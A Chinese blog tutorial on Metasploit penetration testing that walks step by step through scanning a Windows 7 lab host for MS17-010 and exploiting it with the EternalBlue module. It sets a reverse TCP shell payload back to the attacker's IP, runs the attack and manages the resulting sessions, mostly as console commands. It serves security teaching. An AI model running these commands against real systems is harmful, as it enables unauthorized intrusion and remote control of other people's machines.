metasploit渗透测试
使用msf渗透Win7主机,并远程执行命令
整体流程
已知漏洞→查找模块→配置程序→执行exploit
查找模块:
1 2 3 4 | search MS17-... show exploits show payloads show auxiliary |
配置程序:
1 2 3 4 5 6 7 8 9 10 11 | 显示参数: show options show targets show encoders show advanced info xxx ---------- 设置参数: use xxx(exploit) set xxx(payload) set xxx xxx(参数) |
执行exploit:
1 2 | exploit(命令) run(命令) |
查找该漏洞的扫描模块
1 2 3 | msf5 > search ms17-010 ------ auxiliary /scanner/smb/smb_ms17_010 (这是一个扫描模块) |
加载模块
1 2 | msf5 > use auxiliary /scanner/smb/smb_ms17_010 msf5 auxiliary(scanner /smb/smb_ms17_010 ) > |
查看设置哪些参数
1 | msf5 auxiliary(scanner /smb/smb_ms17_010 ) > show options |
设置目标HOSTS
1 | msf5 auxiliary(scanner /smb/smb_ms17_010 ) > set RHOSTS 192.168.255.150 |
查看设置的HOSTS
1 2 | msf5 auxiliary(scanner /smb/smb_ms17_010 ) > show options RHOSTS 192.168.255.150 |
执行攻击命令开始扫描该主机
1 | msf5 auxiliary(scanner /smb/smb_ms17_010 ) > run |
查找该漏洞的攻击模块
1 2 3 | msf5 > search ms17-010 --------- exploit /windows/smb/ms17_010_eternalblue (永恒之蓝) |
加载该模块
1 2 3 | msf5 > use exploit /windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows /x64/meterpreter/reverse_tcp msf5 exploit(windows /smb/ms17_010_eternalblue ) > |
检查要设置的参数
1 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > show options |
设置靶机的HOSTS
1 2 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > set RHOSTS 192.168.255.150 RHOSTS => 192.168.255.150 |
查看可以复现的系统
1 2 3 4 5 6 7 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > show targets Exploit targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs |
使用攻击载荷(payload)设置本地监听
1 2 3 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > search windows /shell -------- payload /windows/shell/reverse_tcp |
设置攻击载荷(payload)
1 2 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > set payload windows /shell/reverse_tcp payload => windows /shell/reverse_tcp |
显示设置的参数
设置本地端口和IP
1 2 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > set LHOST 192.168.255.200 LPORT 4444 LHOST => 192.168.255.200 LPORT 4444 |
执行攻击命令
1 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > run |
拿到shell后解决乱码问题
1 | C:\Windwos\system32> chcp 65001 |
Ctrl+C断开连接
渗透成功之后将会话保存到后台
1 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > exploit -j |
查看保存到后台的会话
1 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > sessions |
启用这个会话
session -i [会话ID]
1 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > sessions -i 2 |
进入会话后想返回而不丢失这个会话,[返回并保持到后台]
1 2 | C:\Windows\system32>background Background session 2? [y /N ] y |
清理这个会话
1 2 | msf5 exploit(windows /smb/ms17_010_eternalblue ) > sessions -k 2 [*] Killing the following session(s): 2 |
参数 | 解释 |
---|---|
Name | 参数名称 |
Current Setting | 默认值 |
Required | 是否必须设置 |
Description | 参数的描述 |
总结使用metasploit攻击的步骤
-
1、查找CVE公布的漏洞
-
2、查找对应的exploit模块
-
3、配置模块参数
-
4、添加payload后门
-
5、执行exploit开始攻击
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!